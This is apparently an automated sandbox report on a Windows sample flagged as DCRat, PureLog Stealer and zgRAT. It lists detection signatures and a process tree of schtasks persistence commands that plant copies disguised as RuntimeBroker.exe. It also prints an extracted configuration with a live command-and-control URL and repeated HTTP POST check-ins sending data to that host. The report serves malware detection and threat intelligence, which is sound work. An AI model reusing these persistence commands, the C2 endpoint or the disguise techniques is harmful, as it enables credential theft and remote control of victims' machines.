Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
U1jaLbTw1f.exe

Overview

General Information

Sample name:U1jaLbTw1f.exe
renamed because original name is a hash value
Original sample name:86af92730370230540800e6d509e4155.exe
Analysis ID:1582948
MD5:86af92730370230540800e6d509e4155
SHA1:06083ba4be5095fb3e43c12ef9cd57468cfa8898
SHA256:fa545f3f6fa282dbe529483bb3fac3dae0ea6c466a7bcb0bb7f843622bec7177
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates processes via WMI
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • U1jaLbTw1f.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\U1jaLbTw1f.exe" MD5: 86AF92730370230540800E6D509E4155)
    • schtasks.exe (PID: 7672 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7696 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7720 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7744 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7768 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7796 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7820 cmdline: schtasks.exe /create /tn "mGDcgYSpPaqkzVyIrStmzarQirIsm" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7844 cmdline: schtasks.exe /create /tn "mGDcgYSpPaqkzVyIrStmzarQirIs" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7868 cmdline: schtasks.exe /create /tn "mGDcgYSpPaqkzVyIrStmzarQirIsm" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7892 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7916 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7940 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7964 cmdline: schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\UserOOBEBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7988 cmdline: schtasks.exe /create /tn "UserOOBEBroker" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\UserOOBEBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8020 cmdline: schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 5 /tr "'C:\Windows\LiveKernelReports\UserOOBEBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8044 cmdline: schtasks.exe /create /tn "U1jaLbTw1fU" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\U1jaLbTw1f.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8084 cmdline: schtasks.exe /create /tn "U1jaLbTw1f" /sc ONLOGON /tr "'C:\Users\user\Desktop\U1jaLbTw1f.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8120 cmdline: schtasks.exe /create /tn "U1jaLbTw1fU" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\U1jaLbTw1f.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 8168 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WGIlBCoJLj.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7212 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7352 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • mGDcgYSpPaqkzVyIrStmzarQirIs.exe (PID: 5016 cmdline: "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe" MD5: 86AF92730370230540800E6D509E4155)
  • mGDcgYSpPaqkzVyIrStmzarQirIs.exe (PID: 8012 cmdline: "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe" MD5: 86AF92730370230540800E6D509E4155)
  • mGDcgYSpPaqkzVyIrStmzarQirIs.exe (PID: 8052 cmdline: "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe" MD5: 86AF92730370230540800E6D509E4155)
  • RuntimeBroker.exe (PID: 8092 cmdline: "C:\Program Files\Windows Security\RuntimeBroker.exe" MD5: 86AF92730370230540800E6D509E4155)
  • RuntimeBroker.exe (PID: 8128 cmdline: "C:\Program Files\Windows Security\RuntimeBroker.exe" MD5: 86AF92730370230540800E6D509E4155)
  • UserOOBEBroker.exe (PID: 8152 cmdline: C:\Windows\LiveKernelReports\UserOOBEBroker.exe MD5: 86AF92730370230540800E6D509E4155)
  • U1jaLbTw1f.exe (PID: 2132 cmdline: C:\Users\user\Desktop\U1jaLbTw1f.exe MD5: 86AF92730370230540800E6D509E4155)
  • U1jaLbTw1f.exe (PID: 2180 cmdline: C:\Users\user\Desktop\U1jaLbTw1f.exe MD5: 86AF92730370230540800E6D509E4155)
  • UserOOBEBroker.exe (PID: 1308 cmdline: C:\Windows\LiveKernelReports\UserOOBEBroker.exe MD5: 86AF92730370230540800E6D509E4155)
  • UserOOBEBroker.exe (PID: 7512 cmdline: C:\Windows\LiveKernelReports\UserOOBEBroker.exe MD5: 86AF92730370230540800E6D509E4155)
  • U1jaLbTw1f.exe (PID: 7392 cmdline: C:\Users\user\Desktop\U1jaLbTw1f.exe MD5: 86AF92730370230540800E6D509E4155)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate", "MUTEX": "DCR_MUTEX-4vN0EXGexU6B21K1d7FI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
U1jaLbTw1f.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    U1jaLbTw1f.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.1642273712.0000000000D82000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000016.00000002.4116310590.000000000346C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000016.00000002.4116310590.0000000003610000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000000.00000002.1687007054.000000001342A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 3 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.U1jaLbTw1f.exe.d80000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.U1jaLbTw1f.exe.d80000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\U1jaLbTw1f.exe, ProcessId: 7584, TargetFilename: C:\Program Files\Windows Security\RuntimeBroker.exe
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Windows Security\RuntimeBroker.exe", CommandLine: "C:\Program Files\Windows Security\RuntimeBroker.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Windows Security\RuntimeBroker.exe, NewProcessName: C:\Program Files\Windows Security\RuntimeBroker.exe, OriginalFileName: C:\Program Files\Windows Security\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files\Windows Security\RuntimeBroker.exe", ProcessId: 8092, ProcessName: RuntimeBroker.exe

                              Persistence and Installation Behavior

                              barindex
                              Sigma detected: Schedule system process
                              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\U1jaLbTw1f.exe", ParentImage: C:\Users\user\Desktop\U1jaLbTw1f.exe, ParentProcessId: 7584, ParentProcessName: U1jaLbTw1f.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f, ProcessId: 7672, ProcessName: schtasks.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-01T04:22:07.349696+010020480951A Network Trojan was detected192.168.2.449730104.21.38.8480TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: U1jaLbTw1f.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.phpAvira URL Cloud: Label: malware
                              Source: http://891781cm.renyash.ru/Avira URL Cloud: Label: malware
                              Source: http://891781cm.renyash.ruAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\WGIlBCoJLj.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Users\user\Desktop\wVAOlxRk.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Users\user\Desktop\YEfCwsuO.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\oGlGPwkc.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\mmgyBVMD.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Found malware configuration
                              Source: 00000000.00000002.1687007054.000000001342A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate", "MUTEX": "DCR_MUTEX-4vN0EXGexU6B21K1d7FI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeReversingLabs: Detection: 71%
                              Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeReversingLabs: Detection: 71%
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\Desktop\YEfCwsuO.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\bGmawssa.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\mmgyBVMD.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\oGlGPwkc.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\tbIFYUNW.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\wVAOlxRk.logReversingLabs: Detection: 70%
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeReversingLabs: Detection: 71%
                              Source: C:\Windows\SchCache\RuntimeBroker.exeReversingLabs: Detection: 71%
                              Multi AV Scanner detection for submitted file
                              Source: U1jaLbTw1f.exeVirustotal: Detection: 55%Perma Link
                              Source: U1jaLbTw1f.exeReversingLabs: Detection: 71%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\wVAOlxRk.logJoe Sandbox ML: detected
                              Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\oGlGPwkc.logJoe Sandbox ML: detected
                              Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJoe Sandbox ML: detected
                              Source: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\wJkgsuUR.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\cDNiSsHV.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: U1jaLbTw1f.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 00000000.00000002.1687007054.000000001342A000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-4vN0EXGexU6B21K1d7FI","0","VLADIK","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                              Source: 00000000.00000002.1687007054.000000001342A000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://891781cm.renyash.ru/","ProcessorServerdefaultsqltrafficuniversalwpprivate"]]
                              Source: U1jaLbTw1f.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDirectory created: C:\Program Files\Windows Security\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDirectory created: C:\Program Files\Windows Security\9e8d7a4ca61bd9Jump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDirectory created: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDirectory created: C:\Program Files\Internet Explorer\SIGNUP\9e8d7a4ca61bd9Jump to behavior
                              Source: U1jaLbTw1f.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 104.21.38.84:80
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 154164Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
